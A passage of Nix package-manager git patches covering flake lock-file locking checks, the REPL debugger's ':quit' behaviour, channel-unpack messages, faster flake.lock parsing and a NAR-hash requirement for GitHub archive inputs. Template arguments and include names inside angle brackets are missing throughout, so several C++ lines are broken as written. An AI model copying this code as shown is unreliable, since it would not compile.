+    experimentalFeatureSettings.require(Xp::Flakes);
 
-    vLocks->mkString(lockedFlake.lockFile.to_string());
+    auto [lockFileStr, keyMap] = lockedFlake.lockFile.to_string();
 
-    emitTreeAttrs(
-        state,
-        lockedFlake.flake.storePath,
-        lockedFlake.flake.lockedRef.input,
-        *vRootSrc,
-        false,
-        lockedFlake.flake.forceDirty);
+    auto overrides = state.buildBindings(lockedFlake.nodePaths.size());
 
-    vRootSubdir->mkString(lockedFlake.flake.lockedRef.subdir);
+    for (auto & [node, storePath] : lockedFlake.nodePaths) {
+        auto override = state.buildBindings(2);
+
+        auto & vSourceInfo = override.alloc(state.symbols.create("sourceInfo"));
+
+        auto lockedNode = node.dynamic_pointer_cast();
+
+        emitTreeAttrs(
+            state,
+            storePath,
+            lockedNode ? lockedNode->lockedRef.input : lockedFlake.flake.lockedRef.input,
+            vSourceInfo,
+            false,
+            !lockedNode && lockedFlake.flake.forceDirty);
+
+        auto key = keyMap.find(node);
+        assert(key != keyMap.end());
+
+        override
+            .alloc(state.symbols.create("dir"))
+            .mkString(lockedNode ? lockedNode->lockedRef.subdir : lockedFlake.flake.lockedRef.subdir);
+
+        overrides.alloc(state.symbols.create(key->second)).mkAttrs(override);
+    }
+
+    auto & vOverrides = state.allocValue()->mkAttrs(overrides);
 
     auto vCallFlake = state.allocValue();
     state.evalFile(state.callFlakeInternal, *vCallFlake);
 
+    auto vTmp1 = state.allocValue();
+    auto vLocks = state.allocValue();
+    vLocks->mkString(lockFileStr);
     state.callFunction(*vCallFlake, *vLocks, *vTmp1, noPos);
-    state.callFunction(*vTmp1, *vRootSrc, *vTmp2, noPos);
-    state.callFunction(*vTmp2, *vRootSubdir, vRes, noPos);
+
+    state.callFunction(*vTmp1, vOverrides, vRes, noPos);
 }
 
 static void prim_getFlake(EvalState & state, const PosIdx pos, Value * * args, Value & v)
diff --git a/src/libexpr/flake/flake.hh b/src/libexpr/flake/flake.hh
index d5ad3eade..19b680c56 100644
--- a/src/libexpr/flake/flake.hh
+++ b/src/libexpr/flake/flake.hh
@@ -103,6 +103,13 @@ struct LockedFlake
     Flake flake;
     LockFile lockFile;
 
+    /**
+     * Store paths of nodes that have been fetched in
+     * lockFlake(); in particular, the root node and the overriden
+     * inputs.
+     */
+    std::map, StorePath> nodePaths;
+
     Fingerprint getFingerprint() const;
 };
 
diff --git a/src/libexpr/flake/lockfile.cc b/src/libexpr/flake/lockfile.cc
index 3e99fb2d4..2c16dc802 100644
--- a/src/libexpr/flake/lockfile.cc
+++ b/src/libexpr/flake/lockfile.cc
@@ -38,7 +38,7 @@ LockedNode::LockedNode(const nlohmann::json & json)
     , isFlake(json.find("flake") != json.end() ? (bool) json["flake"] : true)
 {
     if (!lockedRef.input.isLocked())
-        throw Error("lock file contains mutable lock '%s'",
+        throw Error("lock file contains unlocked input '%s'",
             fetchers::attrsToJSON(lockedRef.input.toAttrs()));
 }
 
@@ -134,10 +134,10 @@ LockFile::LockFile(const nlohmann::json & json, const Path & path)
     // a bit since we don't need to worry about cycles.
 }
 
-nlohmann::json LockFile::toJSON() const
+std::pair LockFile::toJSON() const
 {
     nlohmann::json nodes;
-    std::unordered_map, std::string> nodeKeys;
+    KeyMap nodeKeys;
     std::unordered_set keys;
 
     std::function node)> dumpNode;
@@ -194,12 +194,13 @@ nlohmann::json LockFile::toJSON() const
     json["root"] = dumpNode("root", root);
     json["nodes"] = std::move(nodes);
 
-    return json;
+    return {json, std::move(nodeKeys)};
 }
 
-std::string LockFile::to_string() const
+std::pair LockFile::to_string() const
 {
-    return toJSON().dump(2);
+    auto [json, nodeKeys] = toJSON();
+    return {json.dump(2), std::move(nodeKeys)};
 }
 
 LockFile LockFile::read(const Path & path)
@@ -210,7 +211,7 @@ LockFile LockFile::read(const Path & path)
 
 std::ostream & operator <<(std::ostream & stream, const LockFile & lockFile)
 {
-    stream << lockFile.toJSON().dump(2);
+    stream << lockFile.toJSON().first.dump(2);
     return stream;
 }
 
@@ -243,7 +244,7 @@ std::optional LockFile::isUnlocked() const
 bool LockFile::operator ==(const LockFile & other) const
 {
     // FIXME: slow
-    return toJSON() == other.toJSON();
+    return toJSON().first == other.toJSON().first;
 }
 
 bool LockFile::operator !=(const LockFile & other) const
diff --git a/src/libexpr/flake/lockfile.hh b/src/libexpr/flake/lockfile.hh
index 5a1493404..57a7202a2 100644
--- a/src/libexpr/flake/lockfile.hh
+++ b/src/libexpr/flake/lockfile.hh
@@ -59,14 +59,15 @@ struct LockFile
 
     typedef std::map, std::string> KeyMap;
 
-    nlohmann::json toJSON() const;
+    std::pair toJSON() const;
 
-    std::string to_string() const;
+    std::pair to_string() const;
 
     static LockFile read(const Path & path);
 
     /**
-     * Check whether this lock file has any unlocked inputs.
+     * Check whether this lock file has any unlocked inputs. If so,
+     * return one.
      */
     std::optional isUnlocked() const;
 
diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc
index 1997d5513..b4d9a6189 100644
--- a/src/libexpr/primops/fetchTree.cc
+++ b/src/libexpr/primops/fetchTree.cc
@@ -24,8 +24,6 @@ void emitTreeAttrs(
     bool emptyRevFallback,
     bool forceDirty)
 {
-    assert(input.isLocked());
-
     auto attrs = state.buildBindings(100);
 
     state.mkStorePathString(storePath, attrs.alloc(state.sOutPath));
@@ -176,8 +174,8 @@ static void fetchTree(
             fetcher = "fetchGit";
 
         state.error(
-            "in pure evaluation mode, %s requires a locked input",
-            fetcher
+            "in pure evaluation mode, '%s' will not fetch unlocked input '%s'",
+            fetcher, input.to_string()
         ).atPos(pos).debugThrow();
     }
 
diff --git a/src/libfetchers/fetchers.cc b/src/libfetchers/fetchers.cc
index 9a534c1e2..363ad018e 100644
--- a/src/libfetchers/fetchers.cc
+++ b/src/libfetchers/fetchers.cc
@@ -45,12 +45,8 @@ static void fixupInput(Input & input)
     // Check common attributes.
     input.getType();
     input.getRef();
-    if (input.getRev())
-        input.locked = true;
     input.getRevCount();
     input.getLastModified();
-    if (input.getNarHash())
-        input.locked = true;
 }
 
 Input Input::fromURL(const ParsedURL & url, bool requireTree)
@@ -140,6 +136,11 @@ bool Input::isDirect() const
     return !scheme || scheme->isDirect(*this);
 }
 
+bool Input::isLocked() const
+{
+    return scheme && scheme->isLocked(*this);
+}
+
 Attrs Input::toAttrs() const
 {
     return attrs;
@@ -222,8 +223,6 @@ std::pair Input::fetch(ref store) const
                 input.to_string(), *prevRevCount);
     }
 
-    input.locked = true;
-
     return {std::move(storePath), input};
 }
 
diff --git a/src/libfetchers/fetchers.hh b/src/libfetchers/fetchers.hh
index 036647830..472fba6f4 100644
--- a/src/libfetchers/fetchers.hh
+++ b/src/libfetchers/fetchers.hh
@@ -29,7 +29,6 @@ struct Input
 
     std::shared_ptr scheme; // note: can be null
     Attrs attrs;
-    bool locked = false;
 
     /**
      * path of the parent of this input, used for relative path resolution
@@ -71,7 +70,7 @@ public:
      * Check whether this is a "locked" input, that is,
      * one that contains a commit hash or content hash.
      */
-    bool isLocked() const { return locked; }
+    bool isLocked() const;
 
     bool operator ==(const Input & other) const;
 
@@ -121,7 +120,6 @@ public:
     std::optional getFingerprint(ref store) const;
 };
 
-
 /**
  * The `InputScheme` represents a type of fetcher.  Each fetcher
  * registers with nix at startup time.  When processing an `Input`,
@@ -196,6 +194,14 @@ struct InputScheme
      */
     virtual std::optional getFingerprint(ref store, const Input & input) const
     { return std::nullopt; }
+
+    /**
+     * Return `true` if this input is considered "locked", i.e. it has
+     * attributes like a Git revision or NAR hash that uniquely
+     * identify its contents.
+     */
+    virtual bool isLocked(const Input & input) const
+    { return false; }
 };
 
 void registerInputScheme(std::shared_ptr && fetcher);
diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc
index 97ef35b51..87d114276 100644
--- a/src/libfetchers/git.cc
+++ b/src/libfetchers/git.cc
@@ -737,8 +737,6 @@ struct GitInputScheme : InputScheme
             ? getLastModified(repoInfo, repoInfo.url, *repoInfo.workdirInfo.headRev)
             : 0);
 
-        input.locked = true; // FIXME
-
         return {accessor, std::move(input)};
     }
 
@@ -775,6 +773,11 @@ struct GitInputScheme : InputScheme
         else
             return std::nullopt;
     }
+
+    bool isLocked(const Input & input) const override
+    {
+        return (bool) input.getRev();
+    }
 };
 
 static auto rGitInputScheme = OnStartup([] { registerInputScheme(std::make_unique()); });
diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc
index e6fbece13..76f94337b 100644
--- a/src/libfetchers/github.cc
+++ b/src/libfetchers/github.cc
@@ -280,6 +280,11 @@ struct GitArchiveInputScheme : InputScheme
         return {accessor, input};
     }
 
+    bool isLocked(const Input & input) const override
+    {
+        return (bool) input.getRev();
+    }
+
     std::optional experimentalFeature() const override
     {
         return Xp::Flakes;
diff --git a/src/libfetchers/mercurial.cc b/src/libfetchers/mercurial.cc
index 55e2eae03..a5f55a44e 100644
--- a/src/libfetchers/mercurial.cc
+++ b/src/libfetchers/mercurial.cc
@@ -347,6 +347,11 @@ struct MercurialInputScheme : InputScheme
         return makeResult(infoAttrs, std::move(storePath));
     }
 
+    bool isLocked(const Input & input) const override
+    {
+        return (bool) input.getRev();
+    }
+
     std::optional getFingerprint(ref store, const Input & input) const override
     {
         if (auto rev = input.getRev())
diff --git a/src/libfetchers/path.cc b/src/libfetchers/path.cc
index d3b0e475d..276fd1b36 100644
--- a/src/libfetchers/path.cc
+++ b/src/libfetchers/path.cc
@@ -87,6 +87,11 @@ struct PathInputScheme : InputScheme
         writeFile((CanonPath(getAbsPath(input)) / path).abs(), contents);
     }
 
+    bool isLocked(const Input & input) const override
+    {
+        return (bool) input.getNarHash();
+    }
+
     CanonPath getAbsPath(const Input & input) const
     {
         auto path = getStrAttr(input.attrs, "path");
diff --git a/src/libfetchers/tarball.cc b/src/libfetchers/tarball.cc
index 3b7709440..1d80fd880 100644
--- a/src/libfetchers/tarball.cc
+++ b/src/libfetchers/tarball.cc
@@ -260,6 +260,11 @@ struct CurlInputScheme : InputScheme
             url.query.insert_or_assign("narHash", narHash->to_string(HashFormat::SRI, true));
         return url;
     }
+
+    bool isLocked(const Input & input) const override
+    {
+        return (bool) input.getNarHash();
+    }
 };
 
 struct FileInputScheme : CurlInputScheme
diff --git a/src/nix-env/nix-env.cc b/src/nix-env/nix-env.cc
index 1f311733b..5e3de20c5 100644
--- a/src/nix-env/nix-env.cc
+++ b/src/nix-env/nix-env.cc
@@ -143,7 +143,7 @@ static void getAllExprs(EvalState & state,
             }
             /* Load the expression on demand. */
             auto vArg = state.allocValue();
-            vArg->mkString(path2.path.abs());
+            vArg->mkPath(path2);
             if (seen.size() == maxAttrs)
                 throw Error("too many Nix expressions in directory '%1%'", path);
             attrs.alloc(attrName).mkApp(&state.getBuiltin("import"), vArg);
diff --git a/src/nix/flake.cc b/src/nix/flake.cc
index 4504bb22e..131589f35 100644
--- a/src/nix/flake.cc
+++ b/src/nix/flake.cc
@@ -224,7 +224,7 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
             if (auto lastModified = flake.lockedRef.input.getLastModified())
                 j["lastModified"] = *lastModified;
             j["path"] = store->printStorePath(flake.storePath);
-            j["locks"] = lockedFlake.lockFile.toJSON();
+            j["locks"] = lockedFlake.lockFile.toJSON().first;
             logger->cout("%s", j.dump());
         } else {
             logger->cout(
diff --git a/tests/functional/fetchGit.sh b/tests/functional/fetchGit.sh
index 856c0e534..3f2d0d5fb 100644
--- a/tests/functional/fetchGit.sh
+++ b/tests/functional/fetchGit.sh
@@ -70,7 +70,7 @@ path2=$(nix eval --raw --expr "(builtins.fetchGit { url = file://$repo; rev = \"
 [[ $(nix eval --raw --expr "builtins.readFile (fetchGit { url = file://$repo; rev = \"$rev2\"; } + \"/hello\")") = world ]]
 
 # But without a hash, it fails
-expectStderr 1 nix eval --expr 'builtins.fetchGit "file:///foo"' | grepQuiet "fetchGit requires a locked input"
+expectStderr 1 nix eval --expr 'builtins.fetchGit "file:///foo"' | grepQuiet "'fetchGit' will not fetch unlocked input"
 
 # Fetch again. This should be cached.
 mv $repo ${repo}-tmp
@@ -211,7 +211,7 @@ path6=$(nix eval --impure --raw --expr "(builtins.fetchTree { type = \"git\"; ur
 [[ $path3 = $path6 ]]
 [[ $(nix eval --impure --expr "(builtins.fetchTree { type = \"git\"; url = \"file://$TEST_ROOT/shallow\"; ref = \"dev\"; shallow = true; }).revCount or 123") == 123 ]]
 
-expectStderr 1 nix eval --expr 'builtins.fetchTree { type = "git"; url = "file:///foo"; }' | grepQuiet "fetchTree requires a locked input"
+expectStderr 1 nix eval --expr 'builtins.fetchTree { type = "git"; url = "file:///foo"; }' | grepQuiet "'fetchTree' will not fetch unlocked input"
 
 # Explicit ref = "HEAD" should work, and produce the same outPath as without ref
 path7=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = \"file://$repo\"; ref = \"HEAD\"; }).outPath")

From 2a8fe9a93837733e9dd9ed5c078734a35b203e14 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Fri, 2 Feb 2024 18:53:49 -0800
Subject: [PATCH 492/654] `:quit` in the debugger should quit the whole program

---
 src/libcmd/repl.cc              | 63 ++++++++++++++++++++++++---------
 src/libcmd/repl.hh              |  4 +--
 src/libexpr/eval.cc             | 14 ++++++--
 src/libexpr/eval.hh             |  5 ++-
 src/libexpr/primops.cc          | 11 +-----
 src/libexpr/repl-exit-status.hh | 20 +++++++++++
 src/libmain/shared.cc           |  2 --
 src/libmain/shared.hh           | 10 +-----
 src/libutil/exit.cc             |  7 ++++
 src/libutil/exit.hh             | 19 ++++++++++
 10 files changed, 111 insertions(+), 44 deletions(-)
 create mode 100644 src/libexpr/repl-exit-status.hh
 create mode 100644 src/libutil/exit.cc
 create mode 100644 src/libutil/exit.hh

diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index 03602e170..e423df3fe 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -52,6 +52,27 @@ extern "C" {
 
 namespace nix {
 
+/**
+ * Returned by `NixRepl::processLine`.
+ */
+enum class ProcessLineResult {
+    /**
+     * The user exited with `:quit`. The REPL should exit. The surrounding
+     * program or evaluation (e.g., if the REPL was acting as the debugger)
+     * should also exit.
+     */
+    QuitAll,
+    /**
+     * The user exited with `:continue`. The REPL should exit, but the program
+     * should continue running.
+     */
+    QuitOnce,
+    /**
+     * The user did not exit. The REPL should request another line of input.
+     */
+    Continue,
+};
+
 struct NixRepl
     : AbstractNixRepl
     #if HAVE_BOEHMGC
@@ -75,13 +96,13 @@ struct NixRepl
             std::function getValues);
     virtual ~NixRepl();
 
-    void mainLoop() override;
+    ReplExitStatus mainLoop() override;
     void initEnv() override;
 
     StringSet completePrefix(const std::string & prefix);
     bool getLine(std::string & input, const std::string & prompt);
     StorePath getDerivationPath(Value & v);
-    bool processLine(std::string line);
+    ProcessLineResult processLine(std::string line);
 
     void loadFile(const Path & path);
     void loadFlake(const std::string & flakeRef);
@@ -246,7 +267,7 @@ static std::ostream & showDebugTrace(std::ostream & out, const PosTable & positi
 
 static bool isFirstRepl = true;
 
-void NixRepl::mainLoop()
+ReplExitStatus NixRepl::mainLoop()
 {
     if (isFirstRepl) {
         std::string_view debuggerNotice = "";
@@ -287,15 +308,25 @@ void NixRepl::mainLoop()
         // When continuing input from previous lines, don't print a prompt, just align to the same
         // number of chars as the prompt.
         if (!getLine(input, input.empty() ? "nix-repl> " : "          ")) {
-            // ctrl-D should exit the debugger.
+            // Ctrl-D should exit the debugger.
             state->debugStop = false;
-            state->debugQuit = true;
             logger->cout("");
-            break;
+            // TODO: Should Ctrl-D exit just the current debugger session or
+            // the entire program?
+            return ReplExitStatus::QuitAll;
         }
         logger->resume();
         try {
-            if (!removeWhitespace(input).empty() && !processLine(input)) return;
+            switch (processLine(input)) {
+                case ProcessLineResult::QuitAll:
+                    return ReplExitStatus::QuitAll;
+                case ProcessLineResult::QuitOnce:
+                    return ReplExitStatus::Continue;
+                case ProcessLineResult::Continue:
+                    break;
+                default:
+                    abort();
+            }
         } catch (ParseError & e) {
             if (e.msg().find("unexpected end of file") != std::string::npos) {
                 // For parse errors on incomplete input, we continue waiting for the next line of
@@ -483,10 +514,11 @@ void NixRepl::loadDebugTraceEnv(DebugTrace & dt)
     }
 }
 
-bool NixRepl::processLine(std::string line)
+ProcessLineResult NixRepl::processLine(std::string line)
 {
     line = trim(line);
-    if (line == "") return true;
+    if (line.empty())
+        return ProcessLineResult::Continue;
 
     _isInterrupted = false;
 
@@ -581,13 +613,13 @@ bool NixRepl::processLine(std::string line)
     else if (state->debugRepl && (command == ":s" || command == ":step")) {
         // set flag to stop at next DebugTrace; exit repl.
         state->debugStop = true;
-        return false;
+        return ProcessLineResult::QuitOnce;
     }
 
     else if (state->debugRepl && (command == ":c" || command == ":continue")) {
         // set flag to run to next breakpoint or end of program; exit repl.
         state->debugStop = false;
-        return false;
+        return ProcessLineResult::QuitOnce;
     }
 
     else if (command == ":a" || command == ":add") {
@@ -730,8 +762,7 @@ bool NixRepl::processLine(std::string line)
 
     else if (command == ":q" || command == ":quit") {
         state->debugStop = false;
-        state->debugQuit = true;
-        return false;
+        return ProcessLineResult::QuitAll;
     }
 
     else if (command == ":doc") {
@@ -792,7 +823,7 @@ bool NixRepl::processLine(std::string line)
         }
     }
 
-    return true;
+    return ProcessLineResult::Continue;
 }
 
 void NixRepl::loadFile(const Path & path)
@@ -923,7 +954,7 @@ std::unique_ptr AbstractNixRepl::create(
 }
 
 
-void AbstractNixRepl::runSimple(
+ReplExitStatus AbstractNixRepl::runSimple(
     ref evalState,
     const ValMap & extraEnv)
 {
@@ -945,7 +976,7 @@ void AbstractNixRepl::runSimple(
     for (auto & [name, value] : extraEnv)
         repl->addVarToScope(repl->state->symbols.create(name), *value);
 
-    repl->mainLoop();
+    return repl->mainLoop();
 }
 
 }
diff --git a/src/libcmd/repl.hh b/src/libcmd/repl.hh
index 6d88883fe..21aa8bfc7 100644
--- a/src/libcmd/repl.hh
+++ b/src/libcmd/repl.hh
@@ -28,13 +28,13 @@ struct AbstractNixRepl
         const SearchPath & searchPath, nix::ref store, ref state,
         std::function getValues);
 
-    static void runSimple(
+    static ReplExitStatus runSimple(
         ref evalState,
         const ValMap & extraEnv);
 
     virtual void initEnv() = 0;
 
-    virtual void mainLoop() = 0;
+    virtual ReplExitStatus mainLoop() = 0;
 };
 
 }
diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 832c8369a..3de26bd1e 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -3,6 +3,7 @@
 #include "hash.hh"
 #include "primops.hh"
 #include "print-options.hh"
+#include "shared.hh"
 #include "types.hh"
 #include "util.hh"
 #include "store-api.hh"
@@ -416,7 +417,6 @@ EvalState::EvalState(
     , buildStore(buildStore ? buildStore : store)
     , debugRepl(nullptr)
     , debugStop(false)
-    , debugQuit(false)
     , trylevel(0)
     , regexCache(makeRegexCache())
 #if HAVE_BOEHMGC
@@ -792,7 +792,17 @@ void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr &
     auto se = getStaticEnv(expr);
     if (se) {
         auto vm = mapStaticEnvBindings(symbols, *se.get(), env);
-        (debugRepl)(ref(shared_from_this()), *vm);
+        auto exitStatus = (debugRepl)(ref(shared_from_this()), *vm);
+        switch (exitStatus) {
+            case ReplExitStatus::QuitAll:
+                if (error)
+                    throw *error;
+                throw Exit(0);
+            case ReplExitStatus::Continue:
+                break;
+            default:
+                abort();
+        }
     }
 }
 
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index 8e639a1fa..42fe0d3e4 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -11,6 +11,7 @@
 #include "experimental-features.hh"
 #include "input-accessor.hh"
 #include "search-path.hh"
+#include "repl-exit-status.hh"
 
 #include 
 #include 
@@ -219,9 +220,8 @@ public:
     /**
      * Debugger
      */
-    void (* debugRepl)(ref es, const ValMap & extraEnv);
+    ReplExitStatus (* debugRepl)(ref es, const ValMap & extraEnv);
     bool debugStop;
-    bool debugQuit;
     int trylevel;
     std::list debugTraces;
     std::map> exprEnvs;
@@ -758,7 +758,6 @@ struct DebugTraceStacker {
     DebugTraceStacker(EvalState & evalState, DebugTrace t);
     ~DebugTraceStacker()
     {
-        // assert(evalState.debugTraces.front() == trace);
         evalState.debugTraces.pop_front();
     }
     EvalState & evalState;
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 731485133..5b3b2f11a 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -760,15 +760,6 @@ static RegisterPrimOp primop_break({
 
             auto & dt = state.debugTraces.front();
             state.runDebugRepl(&error, dt.env, dt.expr);
-
-            if (state.debugQuit) {
-                // If the user elects to quit the repl, throw an exception.
-                throw Error(ErrorInfo{
-                    .level = lvlInfo,
-                    .msg = HintFmt("quit the debugger"),
-                    .pos = nullptr,
-                });
-            }
         }
 
         // Return the value we were passed.
@@ -879,7 +870,7 @@ static void prim_tryEval(EvalState & state, const PosIdx pos, Value * * args, Va
     /* increment state.trylevel, and decrement it when this function returns. */
     MaintainCount trylevel(state.trylevel);
 
-    void (* savedDebugRepl)(ref es, const ValMap & extraEnv) = nullptr;
+    ReplExitStatus (* savedDebugRepl)(ref es, const ValMap & extraEnv) = nullptr;
     if (state.debugRepl && evalSettings.ignoreExceptionsDuringTry)
     {
         /* to prevent starting the repl from exceptions withing a tryEval, null it. */
diff --git a/src/libexpr/repl-exit-status.hh b/src/libexpr/repl-exit-status.hh
new file mode 100644
index 000000000..08299ff61
--- /dev/null
+++ b/src/libexpr/repl-exit-status.hh
@@ -0,0 +1,20 @@
+#pragma once
+
+namespace nix {
+
+/**
+ * Exit status returned from the REPL.
+ */
+enum class ReplExitStatus {
+    /**
+     * The user exited with `:quit`. The program (e.g., if the REPL was acting
+     * as the debugger) should exit.
+     */
+    QuitAll,
+    /**
+     * The user exited with `:continue`. The program should continue running.
+     */
+    Continue,
+};
+
+}
diff --git a/src/libmain/shared.cc b/src/libmain/shared.cc
index 7b9b3c5b5..7bced0aa4 100644
--- a/src/libmain/shared.cc
+++ b/src/libmain/shared.cc
@@ -408,6 +408,4 @@ PrintFreed::~PrintFreed()
             showBytes(results.bytesFreed));
 }
 
-Exit::~Exit() { }
-
 }
diff --git a/src/libmain/shared.hh b/src/libmain/shared.hh
index c68f6cd83..99c3dffab 100644
--- a/src/libmain/shared.hh
+++ b/src/libmain/shared.hh
@@ -7,6 +7,7 @@
 #include "common-args.hh"
 #include "path.hh"
 #include "derived-path.hh"
+#include "exit.hh"
 
 #include 
 
@@ -15,15 +16,6 @@
 
 namespace nix {
 
-class Exit : public std::exception
-{
-public:
-    int status;
-    Exit() : status(0) { }
-    Exit(int status) : status(status) { }
-    virtual ~Exit();
-};
-
 int handleExceptions(const std::string & programName, std::function fun);
 
 /**
diff --git a/src/libutil/exit.cc b/src/libutil/exit.cc
new file mode 100644
index 000000000..73cd8b04e
--- /dev/null
+++ b/src/libutil/exit.cc
@@ -0,0 +1,7 @@
+#include "exit.hh"
+
+namespace nix {
+
+Exit::~Exit() {}
+
+}
diff --git a/src/libutil/exit.hh b/src/libutil/exit.hh
new file mode 100644
index 000000000..55f33e62f
--- /dev/null
+++ b/src/libutil/exit.hh
@@ -0,0 +1,19 @@
+#pragma once
+
+#include 
+
+namespace nix {
+
+/**
+ * Exit the program with a given exit code.
+ */
+class Exit : public std::exception
+{
+public:
+    int status;
+    Exit() : status(0) { }
+    explicit Exit(int status) : status(status) { }
+    virtual ~Exit();
+};
+
+}

From 8e71883e3f59100479e96aa1883ef52dbaa03fd3 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Tue, 20 Feb 2024 14:52:16 -0800
Subject: [PATCH 493/654] Rename `ProcessLineResult` variants

---
 src/libcmd/repl.cc | 22 +++++++++++-----------
 1 file changed, 11 insertions(+), 11 deletions(-)

diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index e423df3fe..42ec0f709 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -61,16 +61,16 @@ enum class ProcessLineResult {
      * program or evaluation (e.g., if the REPL was acting as the debugger)
      * should also exit.
      */
-    QuitAll,
+    Quit,
     /**
      * The user exited with `:continue`. The REPL should exit, but the program
      * should continue running.
      */
-    QuitOnce,
+    Continue,
     /**
      * The user did not exit. The REPL should request another line of input.
      */
-    Continue,
+    PromptAgain,
 };
 
 struct NixRepl
@@ -318,11 +318,11 @@ ReplExitStatus NixRepl::mainLoop()
         logger->resume();
         try {
             switch (processLine(input)) {
-                case ProcessLineResult::QuitAll:
+                case ProcessLineResult::Quit:
                     return ReplExitStatus::QuitAll;
-                case ProcessLineResult::QuitOnce:
-                    return ReplExitStatus::Continue;
                 case ProcessLineResult::Continue:
+                    return ReplExitStatus::Continue;
+                case ProcessLineResult::PromptAgain:
                     break;
                 default:
                     abort();
@@ -518,7 +518,7 @@ ProcessLineResult NixRepl::processLine(std::string line)
 {
     line = trim(line);
     if (line.empty())
-        return ProcessLineResult::Continue;
+        return ProcessLineResult::PromptAgain;
 
     _isInterrupted = false;
 
@@ -613,13 +613,13 @@ ProcessLineResult NixRepl::processLine(std::string line)
     else if (state->debugRepl && (command == ":s" || command == ":step")) {
         // set flag to stop at next DebugTrace; exit repl.
         state->debugStop = true;
-        return ProcessLineResult::QuitOnce;
+        return ProcessLineResult::Continue;
     }
 
     else if (state->debugRepl && (command == ":c" || command == ":continue")) {
         // set flag to run to next breakpoint or end of program; exit repl.
         state->debugStop = false;
-        return ProcessLineResult::QuitOnce;
+        return ProcessLineResult::Continue;
     }
 
     else if (command == ":a" || command == ":add") {
@@ -762,7 +762,7 @@ ProcessLineResult NixRepl::processLine(std::string line)
 
     else if (command == ":q" || command == ":quit") {
         state->debugStop = false;
-        return ProcessLineResult::QuitAll;
+        return ProcessLineResult::Quit;
     }
 
     else if (command == ":doc") {
@@ -823,7 +823,7 @@ ProcessLineResult NixRepl::processLine(std::string line)
         }
     }
 
-    return ProcessLineResult::Continue;
+    return ProcessLineResult::PromptAgain;
 }
 
 void NixRepl::loadFile(const Path & path)

From 60eeacc24a0d4dd8dabeb7fcf16b3aea5b8d3192 Mon Sep 17 00:00:00 2001
From: syvb 
Date: Tue, 20 Feb 2024 19:17:18 -0500
Subject: [PATCH 494/654] Say how many channels were unpacked

---
 src/nix-channel/nix-channel.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/nix-channel/nix-channel.cc b/src/nix-channel/nix-channel.cc
index 79db78236..48553fa31 100644
--- a/src/nix-channel/nix-channel.cc
+++ b/src/nix-channel/nix-channel.cc
@@ -138,7 +138,7 @@ static void update(const StringSet & channelNames)
 
     // Unpack the channel tarballs into the Nix store and install them
     // into the channels profile.
-    std::cerr << "unpacking channels...\n";
+    std::cerr << "unpacking " << exprs.size() << " channels...\n";
     Strings envArgs{ "--profile", profile, "--file", unpackChannelPath, "--install", "--remove-all", "--from-expression" };
     for (auto & expr : exprs)
         envArgs.push_back(std::move(expr));

From 7fd0de38c6e2c203e3f3c376dcf9a48424d216fe Mon Sep 17 00:00:00 2001
From: Graham Dennis 
Date: Wed, 21 Feb 2024 18:40:34 +1100
Subject: [PATCH 495/654] Faster flake.lock parsing

This PR reduces the creation of short-lived basic_json objects while
parsing flake.lock files. For large flake.lock files (~1.5MB),
trivial nix build operations previously spent ~60s here; after this
change they take ~1.6s.
---
 src/libexpr/flake/lockfile.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libexpr/flake/lockfile.cc b/src/libexpr/flake/lockfile.cc
index 3e99fb2d4..58ebd97ba 100644
--- a/src/libexpr/flake/lockfile.cc
+++ b/src/libexpr/flake/lockfile.cc
@@ -107,7 +107,7 @@ LockFile::LockFile(const nlohmann::json & json, const Path & path)
                 std::string inputKey = i.value();
                 auto k = nodeMap.find(inputKey);
                 if (k == nodeMap.end()) {
-                    auto nodes = json["nodes"];
+                    auto & nodes = json["nodes"];
                     auto jsonNode2 = nodes.find(inputKey);
                     if (jsonNode2 == nodes.end())
                         throw Error("lock file references missing node '%s'", inputKey);

From 09d76e512a468ad65bedaeda56871de7043849b0 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Wed, 21 Feb 2024 12:08:18 +0100
Subject: [PATCH 496/654] GitArchiveInputScheme: Require a NAR hash

---
 src/libfetchers/github.cc | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc
index 76f94337b..a48c99a0b 100644
--- a/src/libfetchers/github.cc
+++ b/src/libfetchers/github.cc
@@ -282,7 +282,11 @@ struct GitArchiveInputScheme : InputScheme
 
     bool isLocked(const Input & input) const override
     {
-        return (bool) input.getRev();
+        /* Since we can't verify the integrity of the tarball from the
+           Git revision alone, we also require a NAR hash for
+           locking. FIXME: in the future, we may want to require a Git
+           tree hash instead of a NAR hash. */
+        return input.getRev().has_value() && input.getNarHash().has_value();
     }
 
     std::optional experimentalFeature() const override

From b111fba8cd3c5d492565b5dc22a493ed58ef8571 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Wed, 21 Feb 2024 09:07:39 -0800
Subject: [PATCH 497/654] Add documentation, rename to `debugger-on-trace`

---
 doc/manual/rl-next/debugger-on-trace.md |  4 ++--
 src/libexpr/eval-settings.hh            | 11 +++++++++--
 src/libexpr/primops.cc                  |  6 ++++++
 3 files changed, 17 insertions(+), 4 deletions(-)

diff --git a/doc/manual/rl-next/debugger-on-trace.md b/doc/manual/rl-next/debugger-on-trace.md
